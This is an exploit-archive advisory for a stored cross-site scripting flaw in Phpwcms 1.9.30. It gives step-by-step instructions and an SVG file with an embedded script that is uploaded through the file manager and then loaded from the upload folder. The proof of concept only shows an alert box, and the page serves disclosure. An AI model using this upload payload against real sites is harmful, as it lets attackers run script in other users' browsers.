Phpwcms 1.9.30 Cross Site Scripting

2021.10.02

Credit: Okan Kurtulus

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Phpwcms 1.9.30 - File Upload to XSS
# Date: 30/9/2021
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
# Software Link: http://www.phpwcms.org/
# Version: 1.9.30
# Tested on: Ubuntu 16.04
Steps:
1-) You need to login to the system.
http://target.com/phpwcms/login.php
2-) Creating payload with SVG extension: payload.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS!");
</script>
</svg>
3-) Go to the following link and upload the payload:
http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
From the menu:
file -> multiple file upload -> Select files or drop here
4-) After uploading payload, call it from the link below.
http://192.168.1.112/phpwcms/upload/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Phpwcms 1.9.30 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.